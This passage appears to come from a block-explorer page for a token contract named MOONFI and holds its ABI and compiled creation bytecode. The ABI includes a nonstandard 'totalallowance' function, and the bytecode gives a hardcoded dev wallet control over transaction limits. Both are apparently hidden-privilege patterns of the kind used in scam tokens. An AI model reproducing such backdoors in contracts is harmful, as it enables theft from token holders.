:true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rv","type":"uint256"},{"internalType":"uint256","name":"lv","type":"uint256"}],"name":"totalallowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60806040526001600760156101000a81548160ff0219169083151502179055506001600d60006101000a81548160ff0219169083151502179055506000600d60016101000a81548160ff0219169083151502179055506000600d60026101000a81548160ff0219169083151502179055506000600f60006101000a81548160ff0219169083151502179055506001600f60016101000a81548160ff021916908315150217905550348015620000b357600080fd5b506040518060400160405280600681526020017f4d4f4f4e464900000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f4d4f4f4e46490000000000000000000000000000000000000000000000000000815250816003908162000131919062000f35565b50806004908162000143919062000f35565b5050506000620001586200078860201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620002238160016200079060201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002b0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002d6919062001086565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200033e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000364919062001086565b6040518363ffffffff1660e01b815260040162000383929190620010c9565b6020604051808303816000875af1158015620003a3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003c9919062001086565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200043e600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079060201b60201c565b62000473600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200088d60201b60201c565b600060019050600060019050600080600190506000600190506000806b033b2e3c9fd0803ce800000090506064600182620004af919062001125565b620004bb9190620011b5565b600a819055506064600182620004d2919062001125565b620004de9190620011b5565b600c81905550612710600482620004f6919062001125565b620005029190620011b5565b600b81905550866011819055508560128190555084601381905550601354601254601154620005329190620011ed565b6200053e9190620011ed565b6010819055508360158190555082601681905550816017819055506017546016546015546200056e9190620011ed565b6200057a9190620011ed565b60148190555073bad144686e6e9aa9399f851e4fb9d9648dd9b1b2600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073bad144686e6e9aa9399f851e4fb9d9648dd9b1b2600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200064c6200063e6200092e60201b60201c565b60016200095860201b60201c565b6200065f3060016200095860201b60201c565b62000694600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200095860201b60201c565b620006c9600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200095860201b60201c565b620006eb620006dd6200092e60201b60201c565b60016200079060201b60201c565b620006fe3060016200079060201b60201c565b62000733600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079060201b60201c565b62000768600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079060201b60201c565b6200077a338262000aa560201b60201c565b5050505050505050620013f7565b600033905090565b620007a06200078860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000832576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008299062001289565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620009686200078860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614620009fa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009f19062001289565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000a999190620012c8565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b17576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b0e9062001335565b60405180910390fd5b62000b2b6000838362000c5360201b60201c565b62000b478160025462000c5860201b620026711790919060201c565b60028190555062000ba5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c5860201b620026711790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c47919062001368565b60405180910390a35050565b505050565b600080828462000c699190620011ed565b90508381101562000cb1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ca890620013d5565b60405180910390fd5b8091505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000d3d57607f821691505b60208210810362000d535762000d5262000cf5565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000dbd7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000d7e565b62000dc9868362000d7e565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000e1662000e1062000e0a8462000de1565b62000deb565b62000de1565b9050919050565b6000819050919050565b62000e328362000df5565b62000e4a62000e418262000e1d565b84845462000d8b565b825550505050565b600090565b62000e6162000e52565b62000e6e81848462000e27565b505050565b5b8181101562000e965762000e8a60008262000e57565b60018101905062000e74565b5050565b601f82111562000ee55762000eaf8162000d59565b62000eba8462000d6e565b8101602085101562000eca578190505b62000ee262000ed98562000d6e565b83018262000e73565b50505b505050565b600082821c905092915050565b600062000f0a6000198460080262000eea565b1980831691505092915050565b600062000f25838362000ef7565b9150826002028217905092915050565b62000f408262000cbb565b67ffffffffffffffff81111562000f5c5762000f5b62000cc6565b5b62000f68825462000d24565b62000f7582828562000e9a565b600060209050601f83116001811462000fad576000841562000f98578287015190505b62000fa4858262000f17565b86555062001014565b601f19841662000fbd8662000d59565b60005b8281101562000fe75784890151825560018201915060208501945060208101905062000fc0565b8683101562001007578489015162001003601f89168262000ef7565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200104e8262001021565b9050919050565b620010608162001041565b81146200106c57600080fd5b50565b600081519050620010808162001055565b92915050565b6000602082840312156200109f576200109e6200101c565b5b6000620010af848285016200106f565b91505092915050565b620010c38162001041565b82525050565b6000604082019050620010e06000830185620010b8565b620010ef6020830184620010b8565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620011328262000de1565b91506200113f8362000de1565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200117b576200117a620010f6565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620011c28262000de1565b9150620011cf8362000de1565b925082620011e257620011e162001186565b5b828204905092915050565b6000620011fa8262000de1565b9150620012078362000de1565b9250828201905080821115620012225762001221620010f6565b5b92915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006200127160208362001228565b91506200127e8262001239565b602082019050919050565b60006020820190508181036000830152620012a48162001262565b9050919050565b60008115159050919050565b620012c281620012ab565b82525050565b6000602082019050620012df6000830184620012b7565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200131d601f8362001228565b91506200132a82620012e5565b602082019050919050565b6000602082019050818103600083015262001350816200130e565b9050919050565b620013628162000de1565b82525050565b60006020820190506200137f600083018462001357565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000620013bd601b8362001228565b9150620013ca8262001385565b602082019050919050565b60006020820190508181036000830152620013f081620013ae565b9050919050565b61524580620014076000396000f3fe60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fb9565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fb9565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ed8565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cf1565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614000565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ed8565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ed8565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190614093565b611a37565b6040516108f89190613e07565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a906143ec565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b60606004805461187390614142565b80601f016020809104026020016040519081016040528092919081815260200182805461189f90614142565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a000000000000000000000000000000000000000000000000